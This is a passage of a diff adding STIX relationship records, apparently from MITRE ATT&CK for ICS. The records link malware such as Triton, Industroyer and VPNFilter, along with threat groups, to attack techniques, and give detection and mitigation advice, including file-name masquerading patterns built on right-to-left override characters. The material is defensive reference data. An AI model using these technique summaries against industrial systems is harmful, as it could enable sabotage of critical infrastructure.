"2022-10-13T16:53:47.443Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use a Telnet session to load a malware implant on Omron PLCs.(Citation: CISA-AA22-103A)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c84e39ab-30c1-40e3-95a8-fcbb271e913c", + "created": "2022-05-06T17:47:21.168Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Carl Hurd March 2019", + "description": "Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28 ", + "url": "https://www.youtube.com/watch?v=yuZazP22rpI" + }, + { + "source_name": "William Largent June 2018", + "description": "William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28 ", + "url": "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:31:07.308Z", + "description": "The [VPNFilter](https://attack.mitre.org/software/S1010)'s ssler module configures the device's iptables to redirect all traffic destined for port 80 to its local service listening on port 8888. Any outgoing web requests on port 80 are now intercepted by ssler and can be inspected by the ps module and manipulated before being sent to the legitimate HTTP service. (Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)", + "relationship_type": "uses", + "source_ref": "malware--6108f800-10b8-4090-944e-be579f01263d", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:40:47.334Z", + "description": "Collect file hashes. Monitor for file names that do not match their expected hash. Perform file monitoring. Files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE\". For added context on adversary procedures and background see [Masquerading](https://attack.mitre.org/techniques/T1036) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--238f967a-0c29-4aa3-bbb5-3dc593473bbf", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft Security Response Center August 2017", + "description": "Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 ", + "url": "https://msrc-blog.microsoft.com/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" + }, + { + "source_name": "Wikipedia", + "description": "Wikipedia Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 Control-flow integrity Retrieved. 2020/09/25 ", + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:19:12.382Z", + "description": "Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: Microsoft Security Response Center August 2017) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--147c2158-b2af-4d88-9d59-594c67a9200e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.204Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--758d5818-f919-4a6b-9dc2-a212595a11bd", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:49:30.320Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d75333b-2542-4899-923f-55dc1e077a51", + "created": "2022-09-27T16:03:41.224Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:52.592Z", + "description": "Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning PowerShell).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--668f8c4b-225a-4287-ac5b-7717a4f75b5d", + "created": "2023-03-10T20:32:02.472Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:32:02.472Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed for changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b349ef5f-4a05-4eef-afe4-1543b8c832fa", + "type": "relationship", + "created": "2017-05-31T21:33:27.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "source_name": "iSIGHT Sandworm 2014" + }, + { + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "source_name": "F-Secure BlackEnergy 2014" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020." + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020." + }, + { + "source_name": "Secureworks IRON VIKING ", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020." + } + ], + "modified": "2022-02-28T17:02:50.401Z", + "description": "(Citation: iSIGHT Sandworm 2014)(Citation: F-Secure BlackEnergy 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.197Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f347b4fe-d829-427d-851a-fff3393441db", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik August 2019", + "description": "Joe Slowik 2019, August 15 CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack Retrieved. 2019/10/22 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T20:00:00.650Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) contained a module which leveraged a vulnerability in the Siemens SIPROTEC relays (CVE-2015-5374) to create a Denial of Service against automated protective relays. (Citation: Joe Slowik August 2019)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b8d484f3-85e7-4208-8ae4-72f0e055a290", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:45:17.457Z", + "description": "Monitor for network traffic originating from unknown/unexpected systems.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5be1f2b1-75fd-4e7e-901b-495cee4ab5ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.070Z", + "relationship_type": "mitigates", + "description": "Provide an alternative method for sending critical commands message to outstations, this could include using radio/cell communication to send messages to a field technician that physically performs the control function.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5e099568-fb5c-4f58-af7e-4e1b7a9d1128", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Tom Fakterman August 2019", + "description": "Tom Fakterman 2019, August 05 Sodinokibi: The Crown Prince of Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:05:04.619Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) searches for whether the Ahnlab autoup.exe service is running on the target system and injects its payload into this existing process. (Citation: Tom Fakterman August 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f6ff74c2-d088-4252-a8e0-189574863765", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:44:46.032Z", + "description": "Communication authenticity will ensure that any messages tampered with through AiTM can be detected, but cannot prevent eavesdropping on these. In addition, providing communication authenticity around various discovery protocols, such as DNS, can be used to prevent various AiTM procedures.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--31bf1721-78a2-4b6c-b325-5c44dc02ea33", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Eduard Kovacs March 2018", + "description": "Eduard Kovacs 2018, March 1 Five Threat Groups Target Industrial Systems: Dragos Retrieved. 2020/01/03 ", + "url": "https://www.securityweek.com/five-threat-groups-target-industrial-systems-dragos" + }, + { + "source_name": "Novetta Threat Research Group February 2016", + "description": "Novetta Threat Research Group 2016, February 24 Operation Blockbuster: Unraveling the Long Thread of the Sony Attack Retrieved. 2016/02/25 ", + "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:15:30.732Z", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has been observed targeting organizations using spearphishing documents with embedded malicious payloads. (Citation: Novetta Threat Research Group February 2016) Highly targeted spear phishing campaigns have been conducted against a U.S. electric grid company. (Citation: Eduard Kovacs March 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c9065f74-556d-4728-8072-f96642e70316", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:24.739Z", + "modified": "2022-05-06T17:47:24.187Z", + "relationship_type": "mitigates", + "description": "Access Management technologies can help enforce authentication on critical remote service, examples include, but are not limited to, device management services (e.g., telnet, SSH), data access servers (e.g., HTTP, Historians), and HMI sessions (e.g., RDP, VNC).\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ccc67bb3-acc3-4294-81b3-4a0d972f2dd7", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:28:11.304Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s injector, inject.bin, changes the function pointer of the 'get main processor diagnostic data' TriStation command to the address of imain.bin so that it is executed prior to the normal handler. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b960c5ed-1ea8-4dde-9203-c02d291d3bc6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.222Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--154de746-5ea2-43b4-97b2-221b2433cbde", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:48:49.308Z", + "description": "Monitor ICS automation network protocols for information that an asset has been placed into Firmware Update Mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3ab912a4-70aa-45f8-b2ef-57113dde2cfa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.237Z", + "relationship_type": "mitigates", + "description": "Do not inherently rely on the authenticity provided by the network/link layer (e.g., 802.11, LTE, 802.15.4), as link layer equipment may have long lifespans and protocol vulnerabilities may not be easily patched. Provide defense-in-depth by implementing authenticity within the associated application-layer protocol, or through a network-layer VPN. (Citation: CISA March 2010) Furthermore, ensure communication schemes provide strong replay protection, employing techniques such as timestamps or cryptographic nonces.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "external_references": [ + { + "source_name": "CISA March 2010", + "description": "CISA 2010, March 11 https://us-cert.cisa.gov/ncas/tips/ST05-003 Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/ncas/tips/ST05-003" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--808c57e7-72ef-4860-b9ea-8ea072e2385a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.098Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--792324b4-064a-430c-8ffc-7f7acd537778", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec", + "description": "Symantec W32.Duqu The precursor to the next Stuxnet Retrieved. 2019/11/03 ", + "url": "https://docs.broadcom.com/doc/w32-duqu-11-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:44:27.955Z", + "description": "[Duqu](https://attack.mitre.org/software/S0038)'s purpose is to gather intelligence data and assets from entities such as industrial infrastructure and system manufacturers, amongst others not in the industrial sector, in order to more easily conduct a future attack against another third party.(Citation: Symantec)", + "relationship_type": "uses", + "source_ref": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--59cb471f-ad8b-464f-ab8f-c267f329b0dc", + "created": "2023-03-10T20:30:43.206Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:30:43.206Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d90b1271-a90d-41c7-9df7-bec47880c82e", + "created": "2022-09-27T15:33:46.485Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:33:46.485Z", + "description": "Monitor for user accounts logged into systems they would not normally access or abnormal access patterns, such as multiple systems over a relatively short period of time. Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. [Remote Services](https://attack.mitre.org/techniques/T0886) may be used to access a host’s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 